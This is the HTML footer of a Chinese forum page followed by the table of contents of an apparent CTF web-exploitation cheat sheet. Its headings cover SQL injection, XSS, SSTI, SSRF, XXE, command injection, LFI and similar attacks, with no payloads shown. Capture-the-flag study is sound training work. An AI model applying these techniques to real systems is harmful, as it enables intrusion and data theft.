target="_blank">闲社网·线报更新论坛·羊毛分享社区·http://xianshe.com</a> </p> </div> <div class="hl_ftrgh"> <a id="_pingansec_bottomimagelarge_p2p" rel="nofollow" href="https://kashen.com/d/?z6"><img alt="p2p_official_large" title="p2p_official_large" src="template/xianshe/neoconex/p2p_official_large.jpg" /></a> </div> <div class="clear"></div> </div> </div> </div> <div id="scrolltop"> <span hidefocus="true"><a title="返回顶部" onclick="window.scrollTo('0','0')" class="scrolltopa"><b>返回顶部</b></a></span> </div> <script type="text/javascript">_attachEvent(window, 'scroll', function () { showTopLink(); }); checkBlind();</script> </body> </html>

ctf-webCTF网络攻防

ctf-web

CTF Web Exploitation

Prerequisites

Additional Resources

When to Pivot

Quick Start Commands

Reconnaissance

SQL Injection Quick Reference

XSS Quick Reference

XSSI via JSONP Callback Exfiltration

Path Traversal / LFI Quick Reference

JWT Quick Reference

SSTI Quick Reference

Python str.format() Attribute Traversal (PlaidCTF 2017)

SSRF Quick Reference

Command Injection Quick Reference

XXE Quick Reference

PHP Type Juggling Quick Reference

PHP File Inclusion / LFI Quick Reference

Code Injection Quick Reference